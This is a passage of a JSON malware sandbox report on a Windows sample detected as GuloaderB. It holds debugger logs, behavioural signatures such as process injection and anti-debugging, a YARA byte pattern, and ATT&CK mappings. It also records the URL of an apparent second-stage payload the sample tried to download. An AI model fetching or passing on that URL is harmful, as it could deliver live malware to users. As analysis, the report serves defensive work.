[root] DEBUG: 3552: YaraScan hit: GuloaderB\n2025-02-27 23:34:20,315 [root] DEBUG: 3552: Config: bp0 set to 0x0000B128.\n2025-02-27 23:34:20,315 [root] DEBUG: 3552: Config: Action0 set to ret.\n2025-02-27 23:34:20,315 [root] DEBUG: 3552: Config: bp1 set to 0x0000AA1F.\n2025-02-27 23:34:20,315 [root] DEBUG: 3552: Config: Action1 set to ret:2.\n2025-02-27 23:34:20,315 [root] DEBUG: 3552: Config: bp2 set to 0x0000A204.\n2025-02-27 23:34:20,315 [root] DEBUG: 3552: Config: Action2 set to goto:ntdll::NtAllocateVirtualMemory.\n2025-02-27 23:34:20,331 [root] DEBUG: 3552: Config: Trace instruction count set to 0x0\n2025-02-27 23:34:20,331 [root] DEBUG: 3552: Config: bp3 set to 0x00001B62.\n2025-02-27 23:34:20,331 [root] DEBUG: 3552: Config: Action3 set to skip.\n2025-02-27 23:34:20,331 [root] DEBUG: 3552: SetInitialBreakpoints: Breakpoint 0 set on address 0x0056B128 (RVA 0xb128, type 0, hit count 0, thread 2840)\n2025-02-27 23:34:20,331 [root] DEBUG: 3552: SetInitialBreakpoints: Breakpoint 1 set on address 0x0056AA1F (RVA 0xaa1f, type 0, hit count 0, thread 2840)\n2025-02-27 23:34:20,331 [root] DEBUG: 3552: SetInitialBreakpoints: Breakpoint 2 set on address 0x0056A204 (RVA 0xa204, type 0, hit count 0, thread 2840)\n2025-02-27 23:34:20,331 [root] DEBUG: 3552: SetInitialBreakpoints: Breakpoint 3 set on address 0x00561B62 (RVA 0x1b62, type 0, hit count 0, thread 2840)\n2025-02-27 23:34:20,331 [root] DEBUG: 3552: CAPEExceptionFilter: breakpoint 0 hit by instruction at 0x0056B128 (thread 2840)\n2025-02-27 23:34:20,331 [root] DEBUG: 3552: DebuggerOutput: Debugger logfile C:\\KyIbqcSeMB\\debugger\\3552.log.\n2025-02-27 23:34:20,347 [root] DEBUG: 3552: CAPEExceptionFilter: breakpoint 1 hit by instruction at 0x0056AA1F (thread 2840)\n2025-02-27 23:34:20,362 [root] DEBUG: 3552: RtlDispatchException: skipped instruction at 0x56bb2f writing to ntdll (0x771c5560 - 0x75560)\n2025-02-27 23:34:20,394 [root] DEBUG: 3552: CAPEExceptionFilter: breakpoint 2 hit by instruction at 0x0056A204 (thread 2840)\n2025-02-27 23:34:20,409 [root] DEBUG: 3552: InstrumentationCallback: Added region at 0x75860000 to tracked regions list (thread 2840).\n2025-02-27 23:34:20,503 [root] DEBUG: 3552: DLL loaded at 0x75C40000: C:\\Windows\\System32\\SHELL32 (0x5da000 bytes).\n2025-02-27 23:34:20,503 [root] DEBUG: 3552: DLL loaded at 0x72F40000: C:\\Windows\\SYSTEM32\\Msi (0x29b000 bytes).\n2025-02-27 23:34:21,565 [root] DEBUG: 3552: api-rate-cap: memcpy hook disabled due to rate\n2025-02-27 23:34:21,956 [root] DEBUG: 3552: CAPEExceptionFilter: breakpoint 3 hit by instruction at 0x00561B62 (thread 2840)\n2025-02-27 23:34:22,081 [root] DEBUG: 3552: DLL loaded at 0x72AE0000: C:\\Windows\\SYSTEM32\\wininet (0x456000 bytes).\n2025-02-27 23:34:22,190 [root] DEBUG: 3552: DLL loaded at 0x73920000: C:\\Windows\\SYSTEM32\\srvcli (0x1d000 bytes).\n2025-02-27 23:34:22,206 [root] DEBUG: 3552: DLL loaded at 0x74A90000: C:\\Windows\\SYSTEM32\\netutils (0xb000 bytes).\n2025-02-27 23:34:22,206 [root] DEBUG: 3552: DLL loaded at 0x75BB0000: C:\\Windows\\System32\\shcore (0x87000 bytes).\n2025-02-27 23:34:22,206 [root] DEBUG: 3552: DLL loaded at 0x728A0000: C:\\Windows\\SYSTEM32\\iertutil (0x238000 bytes).\n2025-02-27 23:34:22,362 [root] DEBUG: 3552: InstrumentationCallback: Added region at 0x763D0000 to tracked regions list (thread 2840).\n2025-02-27 23:34:22,425 [root] DEBUG: 3552: DLL loaded at 0x743B0000: C:\\Windows\\SYSTEM32\\Wldp (0x25000 bytes).\n2025-02-27 23:34:22,472 [root] DEBUG: 3552: DLL loaded at 0x743E0000: C:\\Windows\\SYSTEM32\\windows.storage (0x618000 bytes).\n2025-02-27 23:34:22,487 [root] DEBUG: 3552: DLL loaded at 0x74A50000: C:\\Windows\\SYSTEM32\\profapi (0x1b000 bytes).\n2025-02-27 23:34:22,519 [root] DEBUG: 3552: DLL loaded at 0x73900000: C:\\Windows\\SYSTEM32\\ondemandconnroutehelper (0x12000 bytes).\n2025-02-27 23:34:22,534 [root] DEBUG: 3552: DLL loaded at 0x73CA0000: C:\\Windows\\SYSTEM32\\winhttp (0xca000 bytes).\n2025-02-27 23:34:22,550 [root] DEBUG: 3552: DLL loaded at 0x74F00000: C:\\Windows\\SYSTEM32\\kernel.appcore (0xf000 bytes).\n2025-02-27 23:34:22,565 [root] DEBUG: 3552: DLL loaded at 0x71A30000: C:\\Windows\\system32\\mswsock (0x53000 bytes).\n2025-02-27 23:34:22,565 [root] DEBUG: 3552: DLL loaded at 0x71E20000: C:\\Windows\\SYSTEM32\\IPHLPAPI (0x32000 bytes).\n2025-02-27 23:34:22,581 [root] DEBUG: 3552: DLL loaded at 0x75B20000: C:\\Windows\\System32\\NSI (0x7000 bytes).\n2025-02-27 23:34:22,597 [root] DEBUG: 3552: DLL loaded at 0x73990000: C:\\Windows\\SYSTEM32\\WINNSI (0x8000 bytes).\n2025-02-27 23:34:22,612 [root] DEBUG: 3552: DLL loaded at 0x726F0000: C:\\Windows\\SYSTEM32\\urlmon (0x1ad000 bytes).\n2025-02-27 23:34:22,628 [root] DEBUG: 3552: DLL loaded at 0x73780000: C:\\Windows\\SYSTEM32\\DNSAPI (0x90000 bytes).\n2025-02-27 23:34:22,644 [root] DEBUG: 3552: DLL loaded at 0x73940000: C:\\Windows\\System32\\rasadhlp (0x8000 bytes).\n2025-02-27 23:34:22,847 [root] DEBUG: 3552: DLL loaded at 0x73720000: C:\\Windows\\System32\\fwpuclnt (0x58000 bytes).\n2025-02-27 23:37:13,003 [root] INFO: Analysis timeout hit, terminating analysis\n2025-02-27 23:37:13,003 [lib.api.process] INFO: Terminate event set for \n2025-02-27 23:37:13,003 [root] DEBUG: 3552: Terminate Event: Attempting to dump process 3552\n2025-02-27 23:37:13,049 [root] DEBUG: 3552: DoProcessDump: Skipping process dump as code is identical on disk.\n2025-02-27 23:37:13,049 [root] DEBUG: 3552: Terminate Event: Current region empty\n2025-02-27 23:37:13,049 [lib.api.process] INFO: Termination confirmed for \n2025-02-27 23:37:13,049 [root] DEBUG: 3552: Terminate Event: monitor shutdown complete for process 3552\n2025-02-27 23:37:13,049 [root] INFO: Terminate event set for process 3552\n2025-02-27 23:37:13,049 [root] INFO: Created shutdown mutex\n2025-02-27 23:37:14,065 [root] INFO: Shutting down package\n2025-02-27 23:37:14,065 [root] INFO: Stopping auxiliary modules\n2025-02-27 23:37:14,065 [root] INFO: Stopping auxiliary module: Browser\n2025-02-27 23:37:14,065 [root] INFO: Stopping auxiliary module: Human\n2025-02-27 23:37:14,987 [root] INFO: Stopping auxiliary module: Screenshots\n2025-02-27 23:37:15,409 [root] INFO: Finishing auxiliary modules\n2025-02-27 23:37:15,409 [root] INFO: Shutting down pipe server and dumping dropped files\n2025-02-27 23:37:15,424 [lib.common.results] INFO: Uploading file C:\\Users\\pacop\\AppData\\Local\\Temp\\~DF888F0BBEA54E1504.TMP to files\\f26626ed50c468d2176a81fef8be843a6422603b7891dd81dfea6bbe06e92c82; Size is 16384; Max size: 100000000\n2025-02-27 23:37:15,440 [root] INFO: Uploading files at path \"C:\\KyIbqcSeMB\\debugger\"\n2025-02-27 23:37:15,440 [lib.common.results] INFO: Uploading file C:\\KyIbqcSeMB\\debugger\\3552.log to debugger\\3552.log; Size is 1775; Max size: 100000000\n2025-02-27 23:37:15,440 [lib.common.results] INFO: Uploading file C:\\KyIbqcSeMB\\debugger\\9224.log to debugger\\9224.log; Size is 2271; Max size: 100000000\n2025-02-27 23:37:15,456 [root] INFO: Uploading files at path \"C:\\KyIbqcSeMB\\tlsdump\"\n2025-02-27 23:37:15,456 [lib.common.results] INFO: Uploading file C:\\KyIbqcSeMB\\tlsdump\\tlsdump.log to tlsdump\\tlsdump.log; Size is 48498; Max size: 100000000\n2025-02-27 23:37:15,471 [root] INFO: Analysis completed\n", "errors": [] }, "network": {}, "suricata": { "alerts": [], "tls": [], "perf": [], "files": [], "http": [], "dns": [], "ssh": [], "fileinfo": [], "eve_log_full_path": null, "alert_log_full_path": null, "tls_log_full_path": null, "http_log_full_path": null, "file_log_full_path": null, "ssh_log_full_path": null, "dns_log_full_path": null }, "url_analysis": {}, "procmemory": [], "signatures": [ { "name": "dead_connect", "description": "Attempts to connect to a dead IP:Port (1 unique times)", "categories": [ "network" ], "severity": 1, "weight": 0, "confidence": 100, "references": [], "data": [ { "type": "call", "pid": 3552, "cid": 968 }, { "type": "call", "pid": 3552, "cid": 999 }, { "type": "call", "pid": 3552, "cid": 1018 }, { "type": "call", "pid": 3552, "cid": 1048 }, { "type": "call", "pid": 3552, "cid": 1067 }, { "type": "call", "pid": 3552, "cid": 1086 }, { "type": "call", "pid": 3552, "cid": 1115 }, { "type": "call", "pid": 3552, "cid": 1135 }, { "type": "call", "pid": 3552, "cid": 1155 }, { "type": "call", "pid": 3552, "cid": 1183 }, { "type": "call", "pid": 3552, "cid": 1202 }, { "type": "call", "pid": 3552, "cid": 1222 }, { "type": "call", "pid": 3552, "cid": 1250 }, { "type": "call", "pid": 3552, "cid": 1270 }, { "type": "call", "pid": 3552, "cid": 1294 }, { "type": "call", "pid": 3552, "cid": 1324 }, { "type": "call", "pid": 3552, "cid": 1343 }, { "type": "call", "pid": 3552, "cid": 1363 }, { "type": "call", "pid": 3552, "cid": 1391 }, { "type": "call", "pid": 3552, "cid": 1423 }, { "type": "call", "pid": 3552, "cid": 1443 }, { "type": "call", "pid": 3552, "cid": 1471 }, { "type": "call", "pid": 3552, "cid": 1491 }, { "type": "call", "pid": 3552, "cid": 1511 }, { "type": "call", "pid": 3552, "cid": 1538 }, { "type": "call", "pid": 3552, "cid": 1559 }, { "type": "call", "pid": 3552, "cid": 1578 }, { "type": "call", "pid": 3552, "cid": 1606 }, { "type": "call", "pid": 3552, "cid": 1625 }, { "type": "call", "pid": 3552, "cid": 1645 }, { "type": "call", "pid": 3552, "cid": 1673 }, { "type": "call", "pid": 3552, "cid": 1693 }, { "type": "call", "pid": 3552, "cid": 1713 }, { "type": "call", "pid": 3552, "cid": 1741 }, { "type": "call", "pid": 3552, "cid": 1763 }, { "type": "call", "pid": 3552, "cid": 1791 }, { "type": "call", "pid": 3552, "cid": 1819 }, { "type": "call", "pid": 3552, "cid": 1838 }, { "type": "call", "pid": 3552, "cid": 1858 }, { "type": "call", "pid": 3552, "cid": 1886 }, { "type": "call", "pid": 3552, "cid": 1905 }, { "type": "call", "pid": 3552, "cid": 1925 }, { "type": "call", "pid": 3552, "cid": 1953 }, { "type": "call", "pid": 3552, "cid": 1973 }, { "type": "call", "pid": 3552, "cid": 1992 } ], "new_data": [], "alert": false, "families": [] }, { "name": "queries_keyboard_layout", "description": "Queries the keyboard layout", "categories": [ "location_discovery" ], "severity": 1, "weight": 1, "confidence": 100, "references": [], "data": [ { "type": "call", "pid": 9224, "cid": 296 }, { "type": "call", "pid": 9224, "cid": 385 }, { "type": "call", "pid": 9224, "cid": 411 }, { "type": "call", "pid": 9224, "cid": 578 }, { "type": "call", "pid": 9224, "cid": 691 } ], "new_data": [], "alert": false, "families": [] }, { "name": "stealth_timeout", "description": "Possible date expiration check, exits too soon after checking local time", "categories": [ "stealth" ], "severity": 1, "weight": 1, "confidence": 40, "references": [], "data": [ { "process": "f1ffd3c13b7bd7f498e8.exe, PID 9224" }, { "type": "call", "pid": 9224, "cid": 1171 } ], "new_data": [], "alert": false, "families": [] }, { "name": "http_request", "description": "Performs HTTP requests potentially not found in PCAP.", "categories": [ "network" ], "severity": 2, "weight": 1, "confidence": 100, "references": [], "data": [ { "type": "call", "pid": 3552, "cid": 971 }, { "type": "call", "pid": 3552, "cid": 1002 }, { "type": "call", "pid": 3552, "cid": 1024 }, { "type": "call", "pid": 3552, "cid": 1051 }, { "type": "call", "pid": 3552, "cid": 1070 }, { "type": "call", "pid": 3552, "cid": 1090 }, { "type": "call", "pid": 3552, "cid": 1119 }, { "type": "call", "pid": 3552, "cid": 1139 }, { "type": "call", "pid": 3552, "cid": 1159 }, { "type": "call", "pid": 3552, "cid": 1186 }, { "type": "call", "pid": 3552, "cid": 1206 }, { "type": "call", "pid": 3552, "cid": 1226 }, { "type": "call", "pid": 3552, "cid": 1254 }, { "type": "call", "pid": 3552, "cid": 1278 }, { "type": "call", "pid": 3552, "cid": 1300 }, { "type": "call", "pid": 3552, "cid": 1327 }, { "type": "call", "pid": 3552, "cid": 1347 }, { "type": "call", "pid": 3552, "cid": 1367 }, { "type": "call", "pid": 3552, "cid": 1395 }, { "type": "call", "pid": 3552, "cid": 1427 }, { "type": "call", "pid": 3552, "cid": 1447 }, { "type": "call", "pid": 3552, "cid": 1475 }, { "type": "call", "pid": 3552, "cid": 1495 }, { "type": "call", "pid": 3552, "cid": 1514 }, { "type": "call", "pid": 3552, "cid": 1541 }, { "type": "call", "pid": 3552, "cid": 1562 }, { "type": "call", "pid": 3552, "cid": 1582 }, { "type": "call", "pid": 3552, "cid": 1609 }, { "type": "call", "pid": 3552, "cid": 1629 }, { "type": "call", "pid": 3552, "cid": 1649 }, { "type": "call", "pid": 3552, "cid": 1677 }, { "type": "call", "pid": 3552, "cid": 1697 }, { "type": "call", "pid": 3552, "cid": 1717 }, { "type": "call", "pid": 3552, "cid": 1747 }, { "type": "call", "pid": 3552, "cid": 1767 }, { "type": "call", "pid": 3552, "cid": 1795 }, { "type": "call", "pid": 3552, "cid": 1822 }, { "type": "call", "pid": 3552, "cid": 1842 }, { "type": "call", "pid": 3552, "cid": 1862 }, { "type": "call", "pid": 3552, "cid": 1889 }, { "type": "call", "pid": 3552, "cid": 1909 }, { "type": "call", "pid": 3552, "cid": 1929 }, { "type": "call", "pid": 3552, "cid": 1957 }, { "type": "call", "pid": 3552, "cid": 1976 }, { "url": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" } ], "new_data": [], "alert": false, "families": [] }, { "name": "resumethread_remote_process", "description": "Resumed a thread in another process", "categories": [ "injection", "unpacking" ], "severity": 2, "weight": 1, "confidence": 100, "references": [], "data": [ { "thread_resumed": "Process f1ffd3c13b7bd7f498e8.exe with process ID 9224 resumed a thread in another process with the process ID 3552" }, { "type": "call", "pid": 9224, "cid": 1170 } ], "new_data": [], "alert": false, "families": [] }, { "name": "antidebug_ntsetinformationthread", "description": "NtSetInformationThread: attempt to hide thread from debugger", "categories": [ "anti-debug" ], "severity": 2, "weight": 1, "confidence": 100, "references": [], "data": [ { "type": "call", "pid": 9224, "cid": 788 } ], "new_data": [], "alert": false, "families": [] }, { "name": "injection_rwx", "description": "Creates RWX memory", "categories": [ "injection" ], "severity": 2, "weight": 1, "confidence": 50, "references": [], "data": [ { "type": "call", "pid": 9224, "cid": 783 } ], "new_data": [], "alert": false, "families": [] }, { "name": "process_creation_suspicious_location", "description": "Created a process from a suspicious location", "categories": [ "execution" ], "severity": 3, "weight": 1, "confidence": 20, "references": [], "data": [ { "file": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1ffd3c13b7bd7f498e8.exe" }, { "command": "\"C:\\Users\\pacop\\AppData\\Local\\Temp\\f1ffd3c13b7bd7f498e8.exe\" " }, { "type": "call", "pid": 9224, "cid": 1153 } ], "new_data": [], "alert": false, "families": [] }, { "name": "procmem_yara", "description": "Yara detections observed in process dumps, payloads or dropped files", "categories": [ "malware" ], "severity": 3, "weight": 4, "confidence": 100, "references": [], "data": [ { "Hit": "PID 3552 triggered the Yara rule 'HeavensGate' with data '['{ 5A 66 BB 33 00 66 53 50 89 E0 83 C4 06 FF 28 }']'" } ], "new_data": [], "alert": false, "families": [] }, { "name": "static_pe_anomaly", "description": "Anomalous binary characteristics", "categories": [ "static" ], "severity": 3, "weight": 1, "confidence": 80, "references": [], "data": [ { "anomaly": "Entrypoint of binary is located outside of any mapped sections" } ], "new_data": [], "alert": false, "families": [] }, { "name": "injection_runpe", "description": "Executed a process and injected code into it, probably while unpacking", "categories": [ "injection" ], "severity": 3, "weight": 1, "confidence": 100, "references": [], "data": [ { "injection": "f1ffd3c13b7bd7f498e8.exe(9224) -> f1ffd3c13b7bd7f498e8.exe(3552)" }, { "type": "call", "pid": 9224, "cid": 1170 } ], "new_data": [], "alert": false, "families": [] } ], "malscore": 8.0, "ttps": [ { "signature": "process_creation_suspicious_location", "ttps": [ "T1106" ], "mbcs": [] }, { "signature": "http_request", "ttps": [ "T1071" ], "mbcs": [ "OC0006", "C0002" ] }, { "signature": "resumethread_remote_process", "ttps": [ "T1055" ], "mbcs": [] } ], "malstatus": "Malicious", "mitre_attck": { "Command and Control": [ { "t_id": "T1071", "ttp_name": "Application Layer Protocol", "description": "Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nAdversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP. ", "signature": [ "http_request" ] } ], "Execution": [ { "t_id": "T1106", "ttp_name": "Native API", "description": "Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.\n\nNative API functions (such as NtCreateProcess) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries.(Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)\n\nHigher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)\n\nAdversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system. While invoking API functions, adversaries may also attempt to bypass defensive tools (ex: unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)).", "signature": [ "process_creation_suspicious_location" ] } ], "Defense Evasion": [ { "t_id": "T1055", "ttp_name": "Process Injection", "description": "Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. \n\nThere are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific. \n\nMore sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel. ", "signature": [ "resumethread_remote_process" ] } ], "Privilege Escalation": [ { "t_id": "T1055", "ttp_name": "Process Injection", "description": "Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. \n\nThere are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific. \n\nMore sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel. ", "signature": [ "resumethread_remote_process" ] } ] } }